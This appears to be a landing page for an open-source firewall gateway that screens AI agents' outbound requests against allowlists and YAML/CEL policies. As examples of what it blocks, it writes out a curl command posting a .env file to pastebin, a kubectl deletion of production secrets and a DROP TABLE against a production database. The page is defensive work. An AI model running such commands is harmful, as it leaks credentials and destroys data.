Policy-based Firewall Gateway for AI Agents

The firewall between
your AI agents and production

Every outbound request pierces the barrier. What ripples through is what your policy allows — masked, held, or bounced before it lands.

GitHub ↗

The barrier · in action

Five real requests.
One barrier deciding each.

Allowlisted traffic crosses. Customer PII is masked in transit. A prod DROP is held for a human; an unknown exfil host is bounced — before anything reaches production.

minaPOST chat.corp.io/api/messages
ALLOWegress · allowlistdelivered
minaPOST llm-api · "…ssn 900101-•••••••…"
MASKpii maskingdelivered · the raw ssn never left the machine
danacurl api.pastebin.com -d @.env
DENYegress · default denyconnection refused · .env never left the machine
junkubectl delete secret prod-api-keys
DENYk8s-no-secret-deleteblocked · prod secrets untouched
junpsql -h prod -c "DROP TABLE users"
prodPAUSEsql-no-prod-dropheld for a human → rejected by security · users table intact

01The threat

One bad inference
drops the table.

Agents run shell, hit APIs, and touch databases. One wrong call is all it takes.

DROP TABLE users curl -d @.env pastebin.com kubectl delete secret token → private host

02How it works

Two layers. One gateway.

SourceAI agent
Layer 1Egress filterdomain allow / deny
Layer 2Protocol engineSQL · K8s · HTTP + CEL
DestinationAPIs · DB · K8s
parsed at the wiresql.verbsql.tablek8s.resourcek8s.verbhttp.methodhttp.path

03Policy · CEL

A verdict before it lands.

  • allow matches the allowlist — passes untouched
  • deny dangerous payloads never reach prod
  • pause ambiguous calls wait for a human
policies/agent.yaml
version: 1
egress:
  default: deny
  allow:
    - github.com
    - api.anthropic.com

rules:
  - name: sql-no-prod-drop
    endpoint: postgres-prod
    condition: "sql.verb == 'DROP' || sql.verb == 'TRUNCATE'"
    verdict: pause  # hold for a human

  - name: k8s-no-secret-delete
    endpoint: k8s-prod
    condition: "k8s.resource == 'secrets' && k8s.verb == 'delete'"
    verdict: deny

04Operating modes

One process, or a whole fleet.

honmoon run -- <cmd>Process wrapperone agent, one machine
honmoon gateway --config p.yamlGatewaya shared, always-on barrier
honmoon join --gateway hostJoina fleet behind one gateway

05Open core

Free on a node. Built for a fleet.

◆ OSS core · Apache-2.0
Free — never locked
  • Full proxy, parsers & CEL engine
  • Single-node YAML policy
  • Local audit log + dashboard
  • Basic pause approval

06Raise the barrier

Put a firewall between your agents and production.